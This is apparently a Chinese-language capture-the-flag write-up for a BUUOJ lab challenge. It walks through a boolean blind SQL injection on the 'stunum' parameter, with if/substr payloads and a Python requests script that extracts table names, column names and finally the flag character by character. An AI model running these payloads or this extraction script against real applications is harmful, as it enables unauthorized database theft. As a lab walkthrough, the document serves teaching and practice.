页面提示输入以查询分数,输入1,链接发现?stunum=1猜测应该是注入
http://0c6ebf06-dd69-4596-8c4b-a13e10a76d3e.node4.buuoj.cn:81/?stunum=1
输入2
输入3
输入4
最多输入到4,可以看到输出显示的内容不一样,可以利用这一点进行注入
payload:
if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='f',1,2)
如果表名的第一个字符为f值就为1否则就为2,为1显示stunum=1页面,为2显示stunum=2页面
测试一下,没得问题
编写脚本
import requests
url = 'http://0c6ebf06-dd69-4596-8c4b-a13e10a76d3e.node4.buuoj.cn:81?stunum='
str = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',',','.','@','_','-',':',';','[',']','{','}']
result = ''
for i in range(1, 30):
for s in str:
geturl = url + "if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1)='%s',1,2)" % (i, s)
res = requests.get(geturl)
if (('Hi admin, your score is: 100' in res.text) and (res.status_code == 200)):
print(s)
result += s
break
print(result)
爆表名
if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1)='f',1,2)
flag,score
爆字段
if(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),1,1)='i',1,2)
flag,value
爆数据
if(substr((select(group_concat(value))from(flag)),1,1)='f',1,2)
得到flag
flag{bf8bc597-fd8b-4761-a041-3684fd2e50e2}